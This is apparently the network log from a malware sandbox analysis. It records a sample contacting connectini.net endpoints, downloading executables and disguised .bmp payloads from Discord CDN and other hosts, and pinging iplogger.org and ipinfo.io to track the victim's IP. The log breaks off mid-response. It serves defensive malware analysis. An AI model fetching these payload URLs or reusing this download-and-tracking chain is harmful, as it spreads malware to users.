Network Analysis
- TCP Requests
- UDP Requests
POST
100
https://connectini.net/Series/SuperNitouDisc.php
POST /Series/SuperNitouDisc.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: connectini.net
Content-Length: 51
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
GET
200
https://connectini.net/S2S/Disc/Disc.php?ezok=folderlyla1&tesla=7
GET /S2S/Disc/Disc.php?ezok=folderlyla1&tesla=7 HTTP/1.1
Host: connectini.net
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Nov 2021 00:06:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.33
X-Powered-By: PleskLin
POST
100
https://connectini.net/Series/Conumer4Publisher.php
POST /Series/Conumer4Publisher.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: connectini.net
Cache-Control: no-store,no-cache
Pragma: no-cache
Content-Length: 53
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
GET
200
https://connectini.net/Series/publisher/1/KR.json
GET /Series/publisher/1/KR.json HTTP/1.1
Host: connectini.net
Cache-Control: no-store,no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Nov 2021 00:06:34 GMT
Content-Type: application/json
Content-Length: 4908
Last-Modified: Thu, 18 Mar 2021 13:08:23 GMT
Connection: keep-alive
ETag: "605350c7-132c"
X-Powered-By: PleskLin
Accept-Ranges: bytes
POST
100
https://connectini.net/Series/Conumer2kenpachi.php
POST /Series/Conumer2kenpachi.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: connectini.net
Content-Length: 53
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
GET
200
https://connectini.net/Series/kenpachi/2/goodchannel/KR.json
GET /Series/kenpachi/2/goodchannel/KR.json HTTP/1.1
Host: connectini.net
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Nov 2021 00:06:58 GMT
Content-Type: application/json
Content-Length: 8280
Last-Modified: Fri, 05 Nov 2021 00:00:03 GMT
Connection: keep-alive
ETag: "61847403-2058"
X-Powered-By: PleskLin
Accept-Ranges: bytes
GET
200
https://connectini.net/Series/configPoduct/2/goodchannel.json
GET /Series/configPoduct/2/goodchannel.json HTTP/1.1
Host: connectini.net
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Nov 2021 00:06:59 GMT
Content-Type: application/json
Content-Length: 344
Last-Modified: Thu, 18 Mar 2021 13:04:50 GMT
Connection: keep-alive
ETag: "60534ff2-158"
X-Powered-By: PleskLin
Accept-Ranges: bytes
GET
200
https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_installrox2_BumperWw
GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_installrox2_BumperWw HTTP/1.1
Host: connectini.net
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Nov 2021 00:07:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.33
X-Powered-By: PleskLin
GET
200
https://connectini.net/ip/check.php?duplicate=kenpachi2_non-search_goodchannel_lyloutta_Traffic
GET /ip/check.php?duplicate=kenpachi2_non-search_goodchannel_lyloutta_Traffic HTTP/1.1
Host: connectini.net
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Nov 2021 00:07:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.33
X-Powered-By: PleskLin
GET
0
https://cdn.discordapp.com/attachments/905701898806493199/905826613411864596/BumperWW.exe
GET /attachments/905701898806493199/905826613411864596/BumperWW.exe HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
GET
200
https://iplogger.org/13LYu7
GET /13LYu7 HTTP/1.1
Host: iplogger.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Nov 2021 00:07:11 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=ng06l03rdlsi0svtdqpb6347k5; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=242977360; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 2d939b5aee78649ba5dcf483ea0aaa5e19e86948b4778e339f04998c89927566
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET
200
https://cdn.discordapp.com/attachments/891021838312931420/902505896159113296/PL_Client.bmp
GET /attachments/891021838312931420/902505896159113296/PL_Client.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:11 GMT
Content-Type: image/x-ms-bmp
Content-Length: 1329668
Connection: keep-alive
CF-Ray: 6a91d72aec4c61a1-ICN
Accept-Ranges: bytes
Age: 826191
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=PL_Client.bmp
ETag: "6542ff843d091ef9901e839405497fa2"
Expires: Sat, 05 Nov 2022 00:07:11 GMT
Last-Modified: Tue, 26 Oct 2021 10:36:13 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1635244573456495
x-goog-hash: crc32c=oNVWKg==
x-goog-hash: md5=ZUL/hD0JHvmQHoOUBUl/og==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 1329668
X-GUploader-UploadID: ADPycdtwhWddoZV5AKuuSgGaxbJgxEniZVV1P3_LPByf4iofBWU7eXZA2qToOdd3Cc6Za17w-NgwgP5Tw7qo12HeiHVimhJCEA
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dV0NXKRt2D5HS0565M%2BFFc8PXD%2BsOQbFnSLYrYovJq0L78bO4%2BcCJizqbm0h9fGzpTOPhyvPgHyLp%2B%2FlEsqo3F9eGYlQsV0E0lg4k%2BzOEuY7d0DtXWf3h7Uhk7nL%2BppczNE4pg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/891021838312931420/902505896159113296/PL_Client.bmp
GET /attachments/891021838312931420/902505896159113296/PL_Client.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:11 GMT
Content-Type: image/x-ms-bmp
Content-Length: 1329668
Connection: keep-alive
CF-Ray: 6a91d72af8fa0fa8-ICN
Accept-Ranges: bytes
Age: 826191
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=PL_Client.bmp
ETag: "6542ff843d091ef9901e839405497fa2"
Expires: Sat, 05 Nov 2022 00:07:11 GMT
Last-Modified: Tue, 26 Oct 2021 10:36:13 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1635244573456495
x-goog-hash: crc32c=oNVWKg==
x-goog-hash: md5=ZUL/hD0JHvmQHoOUBUl/og==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 1329668
X-GUploader-UploadID: ADPycdtwhWddoZV5AKuuSgGaxbJgxEniZVV1P3_LPByf4iofBWU7eXZA2qToOdd3Cc6Za17w-NgwgP5Tw7qo12HeiHVimhJCEA
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kho5X1ODfgGaFSVFLQtNp0dmI1AtkWTvekqrIN7vAIQY5CglSHHz9rH9kVzGDc0bSqV9kJQ0j0Wj9%2BjtYqPcwGZxWegm6Qo3WbH43cXRqoLDeK7Sm9saVHhYY3iVqIQedhtF%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://iplogger.org/12AVi7
GET /12AVi7 HTTP/1.1
Host: iplogger.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Nov 2021 00:07:12 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=ihnjdqqbfcr1uu21t74818ird1; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=242977359; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers: 1
whoami: 2d939b5aee78649ba5dcf483ea0aaa5e19e86948b4778e339f04998c89927566
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET
200
https://ipinfo.io/widget
GET /widget HTTP/1.1
Connection: Keep-Alive
Referer: https://ipinfo.io/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: ipinfo.io
HTTP/1.1 200 OK
access-control-allow-origin: *
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
referrer-policy: strict-origin-when-cross-origin
content-type: application/json; charset=utf-8
content-length: 876
date: Fri, 05 Nov 2021 00:07:12 GMT
x-envoy-upstream-service-time: 21
vary: Accept-Encoding
Via: 1.1 google
Alt-Svc: clear
GET
200
https://ipinfo.io/widget
GET /widget HTTP/1.1
Connection: Keep-Alive
Referer: https://ipinfo.io/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: ipinfo.io
HTTP/1.1 200 OK
access-control-allow-origin: *
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
referrer-policy: strict-origin-when-cross-origin
content-type: application/json; charset=utf-8
content-length: 876
date: Fri, 05 Nov 2021 00:07:12 GMT
x-envoy-upstream-service-time: 21
vary: Accept-Encoding
Via: 1.1 google
Alt-Svc: clear
GET
302
https://d.gogamed.com/userhome/25/any.exe
GET /userhome/25/any.exe HTTP/1.1
Host: d.gogamed.com
Connection: Keep-Alive
HTTP/1.1 302 Found
Date: Fri, 05 Nov 2021 00:07:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
location: https://f.gogamef.com/userhome/25/1bec5879a5da641fb388046719b3c83e.exe
CF-Cache-Status: BYPASS
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=THGkEl8YebzGrTYWFKH3qQNH1PdElS7%2FmoXGkhUx%2FlpNDPeCjItkzI1IIBYHWTagr1lwWmsqRCXhxQ5m4MZT8vwwy5jgxUNgAfULRwHQmiEK%2F0e3nk1jPmxZKpgJ7zPs"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6a91d7304d760a66-KIX
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET
200
https://f.gogamef.com/userhome/25/1bec5879a5da641fb388046719b3c83e.exe
GET /userhome/25/1bec5879a5da641fb388046719b3c83e.exe HTTP/1.1
Host: f.gogamef.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:13 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
content-disposition: attachment; filename="huangm.exe"
content-transfer-encoding: binary
vary: Accept-Encoding
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 2926
Last-Modified: Thu, 04 Nov 2021 23:18:27 GMT
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LH4XLoQYf5TL7O1aenJ10a6XhFx3clXPEcUMzSEw61TjV78NznbN4QtFJuI7kzr1JIZS28voX5LFP8LIASKNPttjy%2BlB25%2FcBLZklDWFIav9f07aGdXlUIebLmQYuZts"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6a91d7381d870a4e-KIX
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET
200
https://iplogger.org/1Xxky7
GET /1Xxky7 HTTP/1.1
Host: iplogger.org
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Nov 2021 00:07:15 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=062e5nrhnkkr19jql73enqcjb3; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=242977356; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers: 2
whoami: 2d939b5aee78649ba5dcf483ea0aaa5e19e86948b4778e339f04998c89927566
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET
200
https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_piyyyyWW
GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_piyyyyWW HTTP/1.1
Host: connectini.net
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Nov 2021 00:07:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.33
X-Powered-By: PleskLin
GET
200
https://cdn.discordapp.com/attachments/891006172130345095/905393686618193921/help0301.bmp
GET /attachments/891006172130345095/905393686618193921/help0301.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:22 GMT
Content-Type: image/x-ms-bmp
Content-Length: 390148
Connection: keep-alive
CF-Ray: 6a91d76b5ae50f74-ICN
Accept-Ranges: bytes
Age: 137326
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=help0301.bmp
ETag: "e24aaa8d072d4b39a37b7d0ac310be49"
Expires: Sat, 05 Nov 2022 00:07:22 GMT
Last-Modified: Wed, 03 Nov 2021 09:51:16 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1635933076334878
x-goog-hash: crc32c=wzJFvw==
x-goog-hash: md5=4kqqjQctSzmje30KwxC+SQ==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 390148
X-GUploader-UploadID: ADPycdsXmOTNxdVhbL6qN3BmWaEC4mfyS9Y3xlk9Tyd7-cE2GU58Df4V8x4994eZCq_exTDRDOJJ8cDR9C5YtaOOpB4g0OWJ4A
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FCHJIyhXX3VB97GmKJ9WT1y8mFU0qLhHujNwx%2FkBC5eeifYJn0GV6TRHByj1ULI7IlGFXXPWFup8vsdF4Mu20Q7LK9J7zfPtM1JB0nlepxCC1dSi%2BGkSMtADdAEYH0mEXpmXMw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/891006172130345095/905799227140083712/real0402.bmp
GET /attachments/891006172130345095/905799227140083712/real0402.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:22 GMT
Content-Type: image/x-ms-bmp
Content-Length: 616452
Connection: keep-alive
CF-Ray: 6a91d76b5cc612d2-ICN
Accept-Ranges: bytes
Age: 40841
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=real0402.bmp
ETag: "0abbac620fc5aa6125f1f754fcfb7414"
Expires: Sat, 05 Nov 2022 00:07:22 GMT
Last-Modified: Thu, 04 Nov 2021 12:42:44 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1636029764735456
x-goog-hash: crc32c=Ab97mQ==
x-goog-hash: md5=CrusYg/FqmEl8fdU/Pt0FA==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 616452
X-GUploader-UploadID: ADPycdv9_sIWLR0nl7xfhbI8Dn65JFajqI8JIULA-Nh3BI5yRXwDhh6sRAyX88rAf7RX_WQ30JR3K1vlcA61g0sv3A
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZJL4X1D%2F6QXfggFGnVv49zs%2BjgjkJ8eTM3Ia091GWTCWb%2B7gcNME%2FvVGqMoQsEZg%2Fk%2FXE0rhmjVBtlWFTxLb7PjxJE466CAaHK0OmwTVNgdgaQTCHRUoaIuTOlRjtsAunhl9Vg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_adxpertmedia_advancedmanager
GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_adxpertmedia_advancedmanager HTTP/1.1
Host: connectini.net
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Nov 2021 00:07:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.1.33
X-Powered-By: PleskLin
GET
200
https://cdn.discordapp.com/attachments/905701898806493199/905894437480181790/Setup12.exe
GET /attachments/905701898806493199/905894437480181790/Setup12.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:22 GMT
Content-Type: application/x-msdos-program
Content-Length: 2873495
Connection: keep-alive
CF-Ray: 6a91d76c1dc312d2-ICN
Accept-Ranges: bytes
Age: 15315
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=Setup12.exe
ETag: "8af36ff6b1f239d0fc0f82dd3d7456f1"
Expires: Sat, 05 Nov 2022 00:07:22 GMT
Last-Modified: Thu, 04 Nov 2021 19:01:04 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1636052464778537
x-goog-hash: crc32c=0ksYgw==
x-goog-hash: md5=ivNv9rHyOdD8D4LdPXRW8Q==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 2873495
X-GUploader-UploadID: ADPycdvYr1VKpHEmMo8HFuXmvfg6QC4pFT9ofrS2FvARbOMAzYyrqm7OFz_8q36nQjg9EYbMrZGMDD0j7WXWNZldrQ
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NYAEqzWIabzZD2%2FnGPL0OzW8dVp5ln9q50qgrxP9%2Bal9x32XrC5vd4wGV9dRLZ8b%2BOw148ACOj1xQw2GgwHSzrASeRMxlZ6%2FuB66hX3vQ9GHHcvQfd25BK2KHGb3UsMj8FI6eg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/891006172130345095/905726762028240896/4chee.bmp
GET /attachments/891006172130345095/905726762028240896/4chee.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:22 GMT
Content-Type: image/x-ms-bmp
Content-Length: 3535068
Connection: keep-alive
CF-Ray: 6a91d76d0cb06194-ICN
Accept-Ranges: bytes
Age: 57554
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=4chee.bmp
ETag: "f2450bebf844c7e16864edf376fbc11a"
Expires: Sat, 05 Nov 2022 00:07:22 GMT
Last-Modified: Thu, 04 Nov 2021 07:54:47 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1636012487824445
x-goog-hash: crc32c=qX4c6g==
x-goog-hash: md5=8kUL6/hEx+FoZO3zdvvBGg==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 3535068
X-GUploader-UploadID: ADPycduhvn19mnWLBi_4LatOA9uAWScoGrHYxC4ls_NerTvr2u7fyHH53NHGeqhjBK1BMXOoRWWqLTvs1lrNfDOe-N48DL-UNQ
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VJbO77vtJjk2jF7hcx%2ByZnSEHbRT470zNusMfR%2F7c1%2FbzrTe5ftsVcFvZA981fmd85xQsRrmeAv7n95lkjjsDEbuAUH%2BXWmTOBiBk%2B3uN7iX4w9JGT6qpKttPaRIzfjifyb8cQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/896617596772839426/897483264074350653/Service.bmp
GET /attachments/896617596772839426/897483264074350653/Service.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:22 GMT
Content-Type: image/x-ms-bmp
Content-Length: 398336
Connection: keep-alive
CF-Ray: 6a91d76d1b58e9f8-ICN
Accept-Ranges: bytes
Age: 2023618
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=Service.bmp
ETag: "19b0bf2bb132231de9dd08f8761c5998"
Expires: Sat, 05 Nov 2022 00:07:22 GMT
Last-Modified: Tue, 12 Oct 2021 13:58:04 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1634047084640154
x-goog-hash: crc32c=8rofXA==
x-goog-hash: md5=GbC/K7EyIx3p3Qj4dhxZmA==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 398336
X-GUploader-UploadID: ADPycdvNYTbv9XMaMw4eqsPhAZ95SFF6BNMkHC4FIwFjV1JqAmYk09LSMZ2PfxLCVnYxOrXs6E137zs8vxYTubF9S3_V3qUOfw
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=m5zVr%2BahXPluy%2FXuwTRAGjUxr3vBf%2FQCyaNuEoXPsAv78hqoPZ4K039xxIegAXuu%2F%2FHGCU2qtxLqY0iNg7vO2zY49pKBeODDhjYnb9yGupaA0tWPXIdJ6RgoJ%2FdXNPk7VpVsFg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/891006172130345095/905750415910514738/5780_0401.bmp
GET /attachments/891006172130345095/905750415910514738/5780_0401.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:22 GMT
Content-Type: image/x-ms-bmp
Content-Length: 593412
Connection: keep-alive
CF-Ray: 6a91d76fdce43514-ICN
Accept-Ranges: bytes
Age: 52423
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=5780_0401.bmp
ETag: "837a41d93e768faf1d590537621e8252"
Expires: Sat, 05 Nov 2022 00:07:22 GMT
Last-Modified: Thu, 04 Nov 2021 09:28:47 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1636018127226662
x-goog-hash: crc32c=GGonVw==
x-goog-hash: md5=g3pB2T52j68dWQU3Yh6CUg==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 593412
X-GUploader-UploadID: ADPycdse1gxmJRBpy2LGORhd2yljYgBKlsNI_i_fikySaRzcCHkRuzqNAgrK9r4g6fdigCYep8H2SfRK2xuplbz5Ng
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Gv7dRQqDA9vNtifv0D6%2F97vVBIVfaAjzbOqZkVpJWE8ZceF41szHhJQkhE2Qve5yq%2FTt3wnaj4UEpG7x5W7GtMgCcQ2yUtOzfpAj1DcngigxYCXfwBSU3%2BLiWBBvzEiyJuoMXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/896617596772839426/897483264074350653/Service.bmp
GET /attachments/896617596772839426/897483264074350653/Service.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:22 GMT
